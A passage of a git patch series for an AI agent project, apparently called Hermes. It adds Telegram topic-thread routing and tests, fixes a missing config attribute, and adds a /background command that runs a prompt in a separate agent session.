+class FakeAgent:
+    def __init__(self, **kwargs):
+        self.tool_progress_callback = kwargs["tool_progress_callback"]
+        self.tools = []
+
+    def run_conversation(self, message, conversation_history=None, task_id=None):
+        self.tool_progress_callback("terminal", "pwd")
+        time.sleep(0.35)
+        self.tool_progress_callback("browser_navigate", "https://example.com")
+        time.sleep(0.35)
+        return {
+            "final_response": "done",
+            "messages": [],
+            "api_calls": 1,
+        }
+
+
+def _make_runner(adapter):
+    gateway_run = importlib.import_module("gateway.run")
+    GatewayRunner = gateway_run.GatewayRunner
+
+    runner = object.__new__(GatewayRunner)
+    runner.adapters = {Platform.TELEGRAM: adapter}
+    runner._prefill_messages = []
+    runner._ephemeral_system_prompt = ""
+    runner._reasoning_config = None
+    runner._provider_routing = {}
+    runner._fallback_model = None
+    runner._session_db = None
+    runner._running_agents = {}
+    runner.hooks = SimpleNamespace(loaded_hooks=False)
+    return runner
+
+
+@pytest.mark.asyncio
+async def test_run_agent_progress_stays_in_originating_topic(monkeypatch, tmp_path):
+    monkeypatch.setenv("HERMES_TOOL_PROGRESS_MODE", "all")
+
+    fake_dotenv = types.ModuleType("dotenv")
+    fake_dotenv.load_dotenv = lambda *args, **kwargs: None
+    monkeypatch.setitem(sys.modules, "dotenv", fake_dotenv)
+
+    fake_run_agent = types.ModuleType("run_agent")
+    fake_run_agent.AIAgent = FakeAgent
+    monkeypatch.setitem(sys.modules, "run_agent", fake_run_agent)
+
+    adapter = ProgressCaptureAdapter()
+    runner = _make_runner(adapter)
+    gateway_run = importlib.import_module("gateway.run")
+    monkeypatch.setattr(gateway_run, "_hermes_home", tmp_path)
+    monkeypatch.setattr(gateway_run, "_resolve_runtime_agent_kwargs", lambda: {"api_key": "fake"})
+    source = SessionSource(
+        platform=Platform.TELEGRAM,
+        chat_id="-1001",
+        chat_type="group",
+        thread_id="17585",
+    )
+
+    result = await runner._run_agent(
+        message="hello",
+        context_prompt="",
+        history=[],
+        source=source,
+        session_id="sess-1",
+        session_key="agent:main:telegram:group:-1001:17585",
+    )
+
+    assert result["final_response"] == "done"
+    assert adapter.sent == [
+        {
+            "chat_id": "-1001",
+            "content": '💻 terminal: "pwd"',
+            "reply_to": None,
+            "metadata": {"thread_id": "17585"},
+        }
+    ]
+    assert adapter.edits
+    assert all(call["metadata"] == {"thread_id": "17585"} for call in adapter.typing)
diff --git a/tests/gateway/test_session.py b/tests/gateway/test_session.py
index 7a7f4b87..e25a0a9c 100644
--- a/tests/gateway/test_session.py
+++ b/tests/gateway/test_session.py
@@ -368,6 +368,17 @@ class TestWhatsAppDMSessionKeyConsistency:
         key = build_session_key(source)
         assert key == "agent:main:discord:group:guild-123"
 
+    def test_group_thread_includes_thread_id(self):
+        """Forum-style threads need a distinct session key within one group."""
+        source = SessionSource(
+            platform=Platform.TELEGRAM,
+            chat_id="-1002285219667",
+            chat_type="group",
+            thread_id="17585",
+        )
+        key = build_session_key(source)
+        assert key == "agent:main:telegram:group:-1002285219667:17585"
+
 
 class TestSessionStoreEntriesAttribute:
     """Regression: /reset must access _entries, not _sessions."""
diff --git a/tests/gateway/test_session_hygiene.py b/tests/gateway/test_session_hygiene.py
index 9ac7b802..d627c205 100644
--- a/tests/gateway/test_session_hygiene.py
+++ b/tests/gateway/test_session_hygiene.py
@@ -8,9 +8,19 @@ The hygiene system uses the SAME compression config as the agent:
 so CLI and messaging platforms behave identically.
 """
 
-import pytest
+import importlib
+import sys
+import types
+from datetime import datetime
+from types import SimpleNamespace
 from unittest.mock import patch, MagicMock, AsyncMock
+
+import pytest
+
 from agent.model_metadata import estimate_messages_tokens_rough
+from gateway.config import GatewayConfig, Platform, PlatformConfig
+from gateway.platforms.base import BasePlatformAdapter, MessageEvent, SendResult
+from gateway.session import SessionEntry, SessionSource
 
 
 # ---------------------------------------------------------------------------
@@ -41,6 +51,32 @@ def _make_large_history_tokens(target_tokens: int) -> list:
     return _make_history(n_msgs, content_size=content_size)
 
 
+class HygieneCaptureAdapter(BasePlatformAdapter):
+    def __init__(self):
+        super().__init__(PlatformConfig(enabled=True, token="fake-token"), Platform.TELEGRAM)
+        self.sent = []
+
+    async def connect(self) -> bool:
+        return True
+
+    async def disconnect(self) -> None:
+        return None
+
+    async def send(self, chat_id, content, reply_to=None, metadata=None) -> SendResult:
+        self.sent.append(
+            {
+                "chat_id": chat_id,
+                "content": content,
+                "reply_to": reply_to,
+                "metadata": metadata,
+            }
+        )
+        return SendResult(success=True, message_id="hygiene-1")
+
+    async def get_chat_info(self, chat_id: str):
+        return {"id": chat_id}
+
+
 # ---------------------------------------------------------------------------
 # Detection threshold tests (model-aware, unified with compression config)
 # ---------------------------------------------------------------------------
@@ -202,3 +238,90 @@ class TestTokenEstimation:
         # Should be well above the 170K threshold for a 200k model
         threshold = int(200_000 * 0.85)
         assert tokens > threshold
+
+
+@pytest.mark.asyncio
+async def test_session_hygiene_messages_stay_in_originating_topic(monkeypatch, tmp_path):
+    fake_dotenv = types.ModuleType("dotenv")
+    fake_dotenv.load_dotenv = lambda *args, **kwargs: None
+    monkeypatch.setitem(sys.modules, "dotenv", fake_dotenv)
+
+    class FakeCompressAgent:
+        def __init__(self, **kwargs):
+            self.model = kwargs.get("model")
+
+        def _compress_context(self, messages, *_args, **_kwargs):
+            return ([{"role": "assistant", "content": "compressed"}], None)
+
+    fake_run_agent = types.ModuleType("run_agent")
+    fake_run_agent.AIAgent = FakeCompressAgent
+    monkeypatch.setitem(sys.modules, "run_agent", fake_run_agent)
+
+    gateway_run = importlib.import_module("gateway.run")
+    GatewayRunner = gateway_run.GatewayRunner
+
+    adapter = HygieneCaptureAdapter()
+    runner = object.__new__(GatewayRunner)
+    runner.config = GatewayConfig(
+        platforms={Platform.TELEGRAM: PlatformConfig(enabled=True, token="fake-token")}
+    )
+    runner.adapters = {Platform.TELEGRAM: adapter}
+    runner.hooks = SimpleNamespace(emit=AsyncMock(), loaded_hooks=False)
+    runner.session_store = MagicMock()
+    runner.session_store.get_or_create_session.return_value = SessionEntry(
+        session_key="agent:main:telegram:group:-1001:17585",
+        session_id="sess-1",
+        created_at=datetime.now(),
+        updated_at=datetime.now(),
+        platform=Platform.TELEGRAM,
+        chat_type="group",
+    )
+    runner.session_store.load_transcript.return_value = _make_history(6, content_size=400)
+    runner.session_store.has_any_sessions.return_value = True
+    runner.session_store.rewrite_transcript = MagicMock()
+    runner.session_store.append_to_transcript = MagicMock()
+    runner._running_agents = {}
+    runner._pending_messages = {}
+    runner._pending_approvals = {}
+    runner._session_db = None
+    runner._is_user_authorized = lambda _source: True
+    runner._set_session_env = lambda _context: None
+    runner._run_agent = AsyncMock(
+        return_value={
+            "final_response": "ok",
+            "messages": [],
+            "tools": [],
+            "history_offset": 0,
+            "last_prompt_tokens": 0,
+        }
+    )
+
+    monkeypatch.setattr(gateway_run, "_hermes_home", tmp_path)
+    monkeypatch.setattr(gateway_run, "_resolve_runtime_agent_kwargs", lambda: {"api_key": "fake"})
+    monkeypatch.setattr(
+        "agent.model_metadata.get_model_context_length",
+        lambda *_args, **_kwargs: 100,
+    )
+    monkeypatch.setenv("TELEGRAM_HOME_CHANNEL", "795544298")
+
+    event = MessageEvent(
+        text="hello",
+        source=SessionSource(
+            platform=Platform.TELEGRAM,
+            chat_id="-1001",
+            chat_type="group",
+            thread_id="17585",
+        ),
+        message_id="1",
+    )
+
+    result = await runner._handle_message(event)
+
+    assert result == "ok"
+    assert len(adapter.sent) == 2
+    assert adapter.sent[0]["chat_id"] == "-1001"
+    assert "Session is large" in adapter.sent[0]["content"]
+    assert adapter.sent[0]["metadata"] == {"thread_id": "17585"}
+    assert adapter.sent[1]["chat_id"] == "-1001"
+    assert "Compressed:" in adapter.sent[1]["content"]
+    assert adapter.sent[1]["metadata"] == {"thread_id": "17585"}
diff --git a/tests/tools/test_send_message_tool.py b/tests/tools/test_send_message_tool.py
new file mode 100644
index 00000000..fc037bc8
--- /dev/null
+++ b/tests/tools/test_send_message_tool.py
@@ -0,0 +1,67 @@
+"""Tests for tools/send_message_tool.py."""
+
+import asyncio
+import json
+from types import SimpleNamespace
+from unittest.mock import AsyncMock, patch
+
+from gateway.config import Platform
+from tools.send_message_tool import send_message_tool
+
+
+def _run_async_immediately(coro):
+    return asyncio.run(coro)
+
+
+def _make_config():
+    telegram_cfg = SimpleNamespace(enabled=True, token="fake-token", extra={})
+    return SimpleNamespace(
+        platforms={Platform.TELEGRAM: telegram_cfg},
+        get_home_channel=lambda _platform: None,
+    ), telegram_cfg
+
+
+class TestSendMessageTool:
+    def test_sends_to_explicit_telegram_topic_target(self):
+        config, telegram_cfg = _make_config()
+
+        with patch("gateway.config.load_gateway_config", return_value=config), \
+             patch("tools.interrupt.is_interrupted", return_value=False), \
+             patch("model_tools._run_async", side_effect=_run_async_immediately), \
+             patch("tools.send_message_tool._send_to_platform", new=AsyncMock(return_value={"success": True})) as send_mock, \
+             patch("gateway.mirror.mirror_to_session", return_value=True) as mirror_mock:
+            result = json.loads(
+                send_message_tool(
+                    {
+                        "action": "send",
+                        "target": "telegram:-1001:17585",
+                        "message": "hello",
+                    }
+                )
+            )
+
+        assert result["success"] is True
+        send_mock.assert_awaited_once_with(Platform.TELEGRAM, telegram_cfg, "-1001", "hello", thread_id="17585")
+        mirror_mock.assert_called_once_with("telegram", "-1001", "hello", source_label="cli", thread_id="17585")
+
+    def test_resolved_telegram_topic_name_preserves_thread_id(self):
+        config, telegram_cfg = _make_config()
+
+        with patch("gateway.config.load_gateway_config", return_value=config), \
+             patch("tools.interrupt.is_interrupted", return_value=False), \
+             patch("gateway.channel_directory.resolve_channel_name", return_value="-1001:17585"), \
+             patch("model_tools._run_async", side_effect=_run_async_immediately), \
+             patch("tools.send_message_tool._send_to_platform", new=AsyncMock(return_value={"success": True})) as send_mock, \
+             patch("gateway.mirror.mirror_to_session", return_value=True):
+            result = json.loads(
+                send_message_tool(
+                    {
+                        "action": "send",
+                        "target": "telegram:Coaching Chat / topic 17585",
+                        "message": "hello",
+                    }
+                )
+            )
+
+        assert result["success"] is True
+        send_mock.assert_awaited_once_with(Platform.TELEGRAM, telegram_cfg, "-1001", "hello", thread_id="17585")
diff --git a/tools/send_message_tool.py b/tools/send_message_tool.py
index 8f5dbb61..f0b1dd27 100644
--- a/tools/send_message_tool.py
+++ b/tools/send_message_tool.py
@@ -8,10 +8,13 @@ human-friendly channel names to IDs. Works in both CLI and gateway contexts.
 import json
 import logging
 import os
+import re
 import time
 
 logger = logging.getLogger(__name__)
 
+_TELEGRAM_TOPIC_TARGET_RE = re.compile(r"^\s*(-?\d+)(?::(\d+))?\s*$")
+
 
 SEND_MESSAGE_SCHEMA = {
     "name": "send_message",
@@ -33,7 +36,7 @@ SEND_MESSAGE_SCHEMA = {
             },
             "target": {
                 "type": "string",
-                "description": "Delivery target. Format: 'platform' (uses home channel), 'platform:#channel-name', or 'platform:chat_id'. Examples: 'telegram', 'discord:#bot-home', 'slack:#engineering', 'signal:+15551234567'"
+                "description": "Delivery target. Format: 'platform' (uses home channel), 'platform:#channel-name', 'platform:chat_id', or Telegram topic 'telegram:chat_id:thread_id'. Examples: 'telegram', 'telegram:-1001234567890:17585', 'discord:#bot-home', 'slack:#engineering', 'signal:+15551234567'"
             },
             "message": {
                 "type": "string",
@@ -73,23 +76,30 @@ def _handle_send(args):
 
     parts = target.split(":", 1)
     platform_name = parts[0].strip().lower()
-    chat_id = parts[1].strip() if len(parts) > 1 else None
+    target_ref = parts[1].strip() if len(parts) > 1 else None
+    chat_id = None
+    thread_id = None
+
+    if target_ref:
+        chat_id, thread_id, is_explicit = _parse_target_ref(platform_name, target_ref)
+    else:
+        is_explicit = False
 
     # Resolve human-friendly channel names to numeric IDs
-    if chat_id and not chat_id.lstrip("-").isdigit():
+    if target_ref and not is_explicit:
         try:
             from gateway.channel_directory import resolve_channel_name
-            resolved = resolve_channel_name(platform_name, chat_id)
+            resolved = resolve_channel_name(platform_name, target_ref)
             if resolved:
-                chat_id = resolved
+                chat_id, thread_id, _ = _parse_target_ref(platform_name, resolved)
             else:
                 return json.dumps({
-                    "error": f"Could not resolve '{chat_id}' on {platform_name}. "
+                    "error": f"Could not resolve '{target_ref}' on {platform_name}. "
                     f"Use send_message(action='list') to see available targets."
                 })
         except Exception:
             return json.dumps({
-                "error": f"Could not resolve '{chat_id}' on {platform_name}. "
+                "error": f"Could not resolve '{target_ref}' on {platform_name}. "
                 f"Try using a numeric channel ID instead."
             })
 
@@ -134,7 +144,7 @@ def _handle_send(args):
 
     try:
         from model_tools import _run_async
-        result = _run_async(_send_to_platform(platform, pconfig, chat_id, message))
+        result = _run_async(_send_to_platform(platform, pconfig, chat_id, message, thread_id=thread_id))
         if used_home_channel and isinstance(result, dict) and result.get("success"):
             result["note"] = f"Sent to {platform_name} home channel (chat_id: {chat_id})"
 
@@ -143,7 +153,7 @@ def _handle_send(args):
             try:
                 from gateway.mirror import mirror_to_session
                 source_label = os.getenv("HERMES_SESSION_PLATFORM", "cli")
-                if mirror_to_session(platform_name, chat_id, message, source_label=source_label):
+                if mirror_to_session(platform_name, chat_id, message, source_label=source_label, thread_id=thread_id):
                     result["mirrored"] = True
             except Exception:
                 pass
@@ -153,11 +163,22 @@ def _handle_send(args):
         return json.dumps({"error": f"Send failed: {e}"})
 
 
-async def _send_to_platform(platform, pconfig, chat_id, message):
+def _parse_target_ref(platform_name: str, target_ref: str):
+    """Parse a tool target into chat_id/thread_id and whether it is explicit."""
+    if platform_name == "telegram":
+        match = _TELEGRAM_TOPIC_TARGET_RE.fullmatch(target_ref)
+        if match:
+            return match.group(1), match.group(2), True
+    if target_ref.lstrip("-").isdigit():
+        return target_ref, None, True
+    return None, None, False
+
+
+async def _send_to_platform(platform, pconfig, chat_id, message, thread_id=None):
     """Route a message to the appropriate platform sender."""
     from gateway.config import Platform
     if platform == Platform.TELEGRAM:
-        return await _send_telegram(pconfig.token, chat_id, message)
+        return await _send_telegram(pconfig.token, chat_id, message, thread_id=thread_id)
     elif platform == Platform.DISCORD:
         return await _send_discord(pconfig.token, chat_id, message)
     elif platform == Platform.SLACK:
@@ -167,12 +188,15 @@ async def _send_to_platform(platform, pconfig, chat_id, message):
     return {"error": f"Direct sending not yet implemented for {platform.value}"}
 
 
-async def _send_telegram(token, chat_id, message):
+async def _send_telegram(token, chat_id, message, thread_id=None):
     """Send via Telegram Bot API (one-shot, no polling needed)."""
     try:
         from telegram import Bot
         bot = Bot(token=token)
-        msg = await bot.send_message(chat_id=int(chat_id), text=message)
+        send_kwargs = {"chat_id": int(chat_id), "text": message}
+        if thread_id is not None:
+            send_kwargs["message_thread_id"] = int(thread_id)
+        msg = await bot.send_message(**send_kwargs)
         return {"success": True, "platform": "telegram", "chat_id": chat_id, "message_id": str(msg.message_id)}
     except ImportError:
         return {"error": "python-telegram-bot not installed. Run: pip install python-telegram-bot"}

From de2b881886bbe3562aac698e71e9dc08db579761 Mon Sep 17 00:00:00 2001
From: SPANISH FLU <mrflu1918@proton.me>
Date: Wed, 11 Mar 2026 09:22:32 +0100
Subject: [PATCH 060/105] test(cron): cover topic thread delivery metadata

---
 tests/cron/test_scheduler.py | 37 ++++++++++++++++++++++++++++++++++++
 1 file changed, 37 insertions(+)

diff --git a/tests/cron/test_scheduler.py b/tests/cron/test_scheduler.py
index 824af11f..312e8010 100644
--- a/tests/cron/test_scheduler.py
+++ b/tests/cron/test_scheduler.py
@@ -16,6 +16,7 @@ class TestResolveOrigin:
                 "platform": "telegram",
                 "chat_id": "123456",
                 "chat_name": "Test Chat",
+                "thread_id": "42",
             }
         }
         result = _resolve_origin(job)
@@ -24,6 +25,7 @@ class TestResolveOrigin:
         assert result["platform"] == "telegram"
         assert result["chat_id"] == "123456"
         assert result["chat_name"] == "Test Chat"
+        assert result["thread_id"] == "42"
 
     def test_no_origin(self):
         assert _resolve_origin({}) is None
@@ -68,6 +70,41 @@ class TestDeliverResultMirrorLogging:
         assert any("mirror_to_session failed" in r.message for r in caplog.records), \
             f"Expected 'mirror_to_session failed' warning in logs, got: {[r.message for r in caplog.records]}"
 
+    def test_origin_delivery_preserves_thread_id(self):
+        """Origin delivery should forward thread_id to send/mirror helpers."""
+        from gateway.config import Platform
+
+        pconfig = MagicMock()
+        pconfig.enabled = True
+        mock_cfg = MagicMock()
+        mock_cfg.platforms = {Platform.TELEGRAM: pconfig}
+
+        job = {
+            "id": "test-job",
+            "deliver": "origin",
+            "origin": {
+                "platform": "telegram",
+                "chat_id": "-1001",
+                "thread_id": "17585",
+            },
+        }
+
+        with patch("gateway.config.load_gateway_config", return_value=mock_cfg), \
+             patch("tools.send_message_tool._send_to_platform", return_value={"success": True}) as send_mock, \
+             patch("gateway.mirror.mirror_to_session") as mirror_mock, \
+             patch("asyncio.run", side_effect=lambda coro: None):
+            _deliver_result(job, "hello")
+
+        send_mock.assert_called_once()
+        assert send_mock.call_args.kwargs["thread_id"] == "17585"
+        mirror_mock.assert_called_once_with(
+            "telegram",
+            "-1001",
+            "hello",
+            source_label="cron",
+            thread_id="17585",
+        )
+
 
 class TestRunJobConfigLogging:
     """Verify that config.yaml parse failures are logged, not silently swallowed."""

From f5324f9aa500ca798f9e910ef1750b8210a46495 Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 02:33:25 -0700
Subject: [PATCH 061/105] fix: initialize self.config in HermesCLI to fix
 AttributeError on slash commands

HermesCLI.__init__ never assigned self.config, causing an
AttributeError ('HermesCLI object has no attribute config')
whenever an unrecognized slash command fell through to the
quick_commands check (line 2832). This broke skill slash commands
like /x-thread-creation since the quick_commands lookup runs
before the skill command check.

Set self.config = CLI_CONFIG in __init__, matching the pattern
used by the gateway (run.py:199).
---
 cli.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/cli.py b/cli.py
index b3627fc4..e9019ca4 100755
--- a/cli.py
+++ b/cli.py
@@ -1107,6 +1107,7 @@ class HermesCLI:
         """
         # Initialize Rich console
         self.console = Console()
+        self.config = CLI_CONFIG
         self.compact = compact if compact is not None else CLI_CONFIG["display"].get("compact", False)
         # tool_progress: "off", "new", "all", "verbose" (from config.yaml display section)
         self.tool_progress_mode = CLI_CONFIG["display"].get("tool_progress", "all")

From bd2606a5760a6a56e4d95190cd2721fed9975f89 Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 02:32:43 -0700
Subject: [PATCH 062/105] fix: initialize self.config in HermesCLI to fix
 AttributeError on slash commands

HermesCLI.__init__ never assigned self.config, causing an
AttributeError ('HermesCLI' object has no attribute 'config')
whenever an unrecognized slash command fell through to the
quick_commands check on line 2838. This affected skill slash
commands like /x-thread-creation since the quick_commands lookup
runs before the skill command check.

Set self.config = CLI_CONFIG in __init__ to match the pattern used
by the gateway (run.py:199).
---
 cli.py | 113 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 113 insertions(+)

diff --git a/cli.py b/cli.py
index e9019ca4..4d84fe96 100755
--- a/cli.py
+++ b/cli.py
@@ -1244,6 +1244,10 @@ class HermesCLI:
         self._command_running = False
         self._command_status = ""
 
+        # Background task tracking: {task_id: threading.Thread}
+        self._background_tasks: Dict[str, threading.Thread] = {}
+        self._background_task_counter = 0
+
     def _invalidate(self, min_interval: float = 0.25) -> None:
         """Throttled UI repaint — prevents terminal blinking on slow/SSH connections."""
         import time as _time
@@ -2825,6 +2829,8 @@ class HermesCLI:
                 self._reload_mcp()
         elif cmd_lower.startswith("/rollback"):
             self._handle_rollback_command(cmd_original)
+        elif cmd_lower.startswith("/background"):
+            self._handle_background_command(cmd_original)
         elif cmd_lower.startswith("/skin"):
             self._handle_skin_command(cmd_original)
         else:
@@ -2869,6 +2875,113 @@ class HermesCLI:
         
         return True
     
+    def _handle_background_command(self, cmd: str):
+        """Handle /background <prompt> — run a prompt in a separate background session.
+
+        Spawns a new AIAgent in a background thread with its own session.
+        When it completes, prints the result to the CLI without modifying
+        the active session's conversation history.
+        """
+        parts = cmd.strip().split(maxsplit=1)
+        if len(parts) < 2 or not parts[1].strip():
+            _cprint("  Usage: /background <prompt>")
+            _cprint("  Example: /background Summarize the top HN stories today")
+            _cprint("  The task runs in a separate session and results display here when done.")
+            return
+
+        prompt = parts[1].strip()
+        self._background_task_counter += 1
+        task_num = self._background_task_counter
+        task_id = f"bg_{datetime.now().strftime('%H%M%S')}_{uuid.uuid4().hex[:6]}"
+
+        # Make sure we have valid credentials
+        if not self._ensure_runtime_credentials():
+            _cprint("  (>_<) Cannot start background task: no valid credentials.")
+            return
+
+        _cprint(f"  🔄 Background task #{task_num} started: \"{prompt[:60]}{'...' if len(prompt) > 60 else ''}\"")
+        _cprint(f"  Task ID: {task_id}")
+        _cprint(f"  You can continue chatting — results will appear when done.\n")
+
+        def run_background():
+            try:
+                bg_agent = AIAgent(
+                    model=self.model,
+                    api_key=self.api_key,
+                    base_url=self.base_url,
+                    provider=self.provider,
+                    api_mode=self.api_mode,
+                    max_iterations=self.max_turns,
+                    enabled_toolsets=self.enabled_toolsets,
+                    quiet_mode=True,
+                    verbose_logging=False,
+                    session_id=task_id,
+                    platform="cli",
+                    session_db=self._session_db,
+                    reasoning_config=self.reasoning_config,
+                    providers_allowed=self._providers_only,
+                    providers_ignored=self._providers_ignore,
+                    providers_order=self._providers_order,
+                    provider_sort=self._provider_sort,
+                    provider_require_parameters=self._provider_require_params,
+                    provider_data_collection=self._provider_data_collection,
+                    fallback_model=self._fallback_model,
+                )
+
+                result = bg_agent.run_conversation(
+                    user_message=prompt,
+                    task_id=task_id,
+                )
+
+                response = result.get("final_response", "") if result else ""
+                if not response and result and result.get("error"):
+                    response = f"Error: {result['error']}"
+
+                # Display result in the CLI (thread-safe via patch_stdout)
+                print()
+                _cprint(f"{_GOLD}{'─' * 40}{_RST}")
+                _cprint(f"  ✅ Background task #{task_num} complete")
+                _cprint(f"  Prompt: \"{prompt[:60]}{'...' if len(prompt) > 60 else ''}\"")
+                _cprint(f"{_GOLD}{'─' * 40}{_RST}")
+                if response:
+                    try:
+                        from hermes_cli.skin_engine import get_active_skin
+                        _skin = get_active_skin()
+                        label = _skin.get_branding("response_label", "⚕ Hermes")
+                        _resp_color = _skin.get_color("response_border", "#CD7F32")
+                    except Exception:
+                        label = "⚕ Hermes"
+                        _resp_color = "#CD7F32"
+
+                    _chat_console = ChatConsole()
+                    _chat_console.print(Panel(
+                        response,
+                        title=f"[bold]{label} (background #{task_num})[/bold]",
+                        title_align="left",
+                        border_style=_resp_color,
+                        box=rich_box.HORIZONTALS,
+                        padding=(1, 2),
+                    ))
+                else:
+                    _cprint("  (No response generated)")
+
+                # Play bell if enabled
+                if self.bell_on_complete:
+                    sys.stdout.write("\a")
+                    sys.stdout.flush()
+
+            except Exception as e:
+                print()
+                _cprint(f"  ❌ Background task #{task_num} failed: {e}")
+            finally:
+                self._background_tasks.pop(task_id, None)
+                if self._app:
+                    self._invalidate(min_interval=0)
+
+        thread = threading.Thread(target=run_background, daemon=True, name=f"bg-task-{task_id}")
+        self._background_tasks[task_id] = thread
+        thread.start()
+
     def _handle_skin_command(self, cmd: str):
         """Handle /skin [name] — show or change the display skin."""
         try:

From b8067ac27e7a79cfea627bdd65c7f45d1b69eedb Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 02:41:36 -0700
Subject: [PATCH 063/105] feat: add /background command to gateway and CLI
 commands registry

Add /background <prompt> to the gateway, allowing users on Telegram,
Discord, Slack, etc. to fire off a prompt in a separate agent session.
The result is delivered back to the same chat when done, without
modifying the active conversation history.

Implementation:
- _handle_background_command: validates input, spawns asyncio task
- _run_background_task: creates AIAgent in executor thread, delivers
  result (text, images, media files) back via the platform adapter
- Inherits model, toolsets, provider routing from gateway config
- Error handling with user-visible failure messages

Also adds /background to hermes_cli/commands.py registry so it
appears in /help and autocomplete.

Tests: 15 new tests covering usage, task creation, uniqueness,
multi-platform, error paths, and help/autocomplete integration.
---
 gateway/run.py                           | 209 +++++++++++++++-
 hermes_cli/commands.py                   |   1 +
 tests/gateway/test_background_command.py | 305 +++++++++++++++++++++++
 tests/hermes_cli/test_commands.py        |   2 +-
 4 files changed, 515 insertions(+), 2 deletions(-)
 create mode 100644 tests/gateway/test_background_command.py

diff --git a/gateway/run.py b/gateway/run.py
index be89833a..f7703f9b 100644
--- a/gateway/run.py
+++ b/gateway/run.py
@@ -806,7 +806,8 @@ class GatewayRunner:
         _known_commands = {"new", "reset", "help", "status", "stop", "model",
                           "personality", "retry", "undo", "sethome", "set-home",
                           "compress", "usage", "insights", "reload-mcp", "reload_mcp",
-                          "update", "title", "resume", "provider", "rollback"}
+                          "update", "title", "resume", "provider", "rollback",
+                          "background"}
         if command and command in _known_commands:
             await self.hooks.emit(f"command:{command}", {
                 "platform": source.platform.value if source.platform else "",
@@ -868,6 +869,9 @@ class GatewayRunner:
 
         if command == "rollback":
             return await self._handle_rollback_command(event)
+
+        if command == "background":
+            return await self._handle_background_command(event)
         
         # User-defined quick commands (bypass agent loop, no LLM call)
         if command:
@@ -1495,6 +1499,7 @@ class GatewayRunner:
             "`/usage` — Show token usage for this session",
             "`/insights [days]` — Show usage insights and analytics",
             "`/rollback [number]` — List or restore filesystem checkpoints",
+            "`/background <prompt>` — Run a prompt in a separate background session",
             "`/reload-mcp` — Reload MCP servers from config",
             "`/update` — Update Hermes Agent to the latest version",
             "`/help` — Show this message",
@@ -1904,6 +1909,208 @@ class GatewayRunner:
             )
         return f"❌ {result['error']}"
 
+    async def _handle_background_command(self, event: MessageEvent) -> str:
+        """Handle /background <prompt> — run a prompt in a separate background session.
+
+        Spawns a new AIAgent in a background thread with its own session.
+        When it completes, sends the result back to the same chat without
+        modifying the active session's conversation history.
+        """
+        prompt = event.get_command_args().strip()
+        if not prompt:
+            return (
+                "Usage: /background <prompt>\n"
+                "Example: /background Summarize the top HN stories today\n\n"
+                "Runs the prompt in a separate session. "
+                "You can keep chatting — the result will appear here when done."
+            )
+
+        source = event.source
+        task_id = f"bg_{datetime.now().strftime('%H%M%S')}_{os.urandom(3).hex()}"
+
+        # Fire-and-forget the background task
+        asyncio.create_task(
+            self._run_background_task(prompt, source, task_id)
+        )
+
+        preview = prompt[:60] + ("..." if len(prompt) > 60 else "")
+        return f'🔄 Background task started: "{preview}"\nTask ID: {task_id}\nYou can keep chatting — results will appear when done.'
+
+    async def _run_background_task(
+        self, prompt: str, source: "SessionSource", task_id: str
+    ) -> None:
+        """Execute a background agent task and deliver the result to the chat."""
+        from run_agent import AIAgent
+
+        adapter = self.adapters.get(source.platform)
+        if not adapter:
+            logger.warning("No adapter for platform %s in background task %s", source.platform, task_id)
+            return
+
+        _thread_metadata = {"thread_id": source.thread_id} if source.thread_id else None
+
+        try:
+            runtime_kwargs = _resolve_runtime_agent_kwargs()
+            if not runtime_kwargs.get("api_key"):
+                await adapter.send(
+                    source.chat_id,
+                    f"❌ Background task {task_id} failed: no provider credentials configured.",
+                    metadata=_thread_metadata,
+                )
+                return
+
+            # Read model from config (same as _run_agent)
+            model = os.getenv("HERMES_MODEL") or os.getenv("LLM_MODEL") or "anthropic/claude-opus-4.6"
+            try:
+                import yaml as _y
+                _cfg_path = _hermes_home / "config.yaml"
+                if _cfg_path.exists():
+                    with open(_cfg_path, encoding="utf-8") as _f:
+                        _cfg = _y.safe_load(_f) or {}
+                    _model_cfg = _cfg.get("model", {})
+                    if isinstance(_model_cfg, str):
+                        model = _model_cfg
+                    elif isinstance(_model_cfg, dict):
+                        model = _model_cfg.get("default", model)
+            except Exception:
+                pass
+
+            # Determine toolset (same logic as _run_agent)
+            default_toolset_map = {
+                Platform.LOCAL: "hermes-cli",
+                Platform.TELEGRAM: "hermes-telegram",
+                Platform.DISCORD: "hermes-discord",
+                Platform.WHATSAPP: "hermes-whatsapp",
+                Platform.SLACK: "hermes-slack",
+                Platform.SIGNAL: "hermes-signal",
+                Platform.HOMEASSISTANT: "hermes-homeassistant",
+            }
+            platform_toolsets_config = {}
+            try:
+                config_path = _hermes_home / 'config.yaml'
+                if config_path.exists():
+                    import yaml
+                    with open(config_path, 'r', encoding="utf-8") as f:
+                        user_config = yaml.safe_load(f) or {}
+                    platform_toolsets_config = user_config.get("platform_toolsets", {})
+            except Exception:
+                pass
+
+            platform_config_key = {
+                Platform.LOCAL: "cli",
+                Platform.TELEGRAM: "telegram",
+                Platform.DISCORD: "discord",
+                Platform.WHATSAPP: "whatsapp",
+                Platform.SLACK: "slack",
+                Platform.SIGNAL: "signal",
+                Platform.HOMEASSISTANT: "homeassistant",
+            }.get(source.platform, "telegram")
+
+            config_toolsets = platform_toolsets_config.get(platform_config_key)
+            if config_toolsets and isinstance(config_toolsets, list):
+                enabled_toolsets = config_toolsets
+            else:
+                default_toolset = default_toolset_map.get(source.platform, "hermes-telegram")
+                enabled_toolsets = [default_toolset]
+
+            platform_key = "cli" if source.platform == Platform.LOCAL else source.platform.value
+
+            pr = self._provider_routing
+            max_iterations = int(os.getenv("HERMES_MAX_ITERATIONS", "90"))
+
+            def run_sync():
+                agent = AIAgent(
+                    model=model,
+                    **runtime_kwargs,
+                    max_iterations=max_iterations,
+                    quiet_mode=True,
+                    verbose_logging=False,
+                    enabled_toolsets=enabled_toolsets,
+                    reasoning_config=self._reasoning_config,
+                    providers_allowed=pr.get("only"),
+                    providers_ignored=pr.get("ignore"),
+                    providers_order=pr.get("order"),
+                    provider_sort=pr.get("sort"),
+                    provider_require_parameters=pr.get("require_parameters", False),
+                    provider_data_collection=pr.get("data_collection"),
+                    session_id=task_id,
+                    platform=platform_key,
+                    session_db=self._session_db,
+                    fallback_model=self._fallback_model,
+                )
+
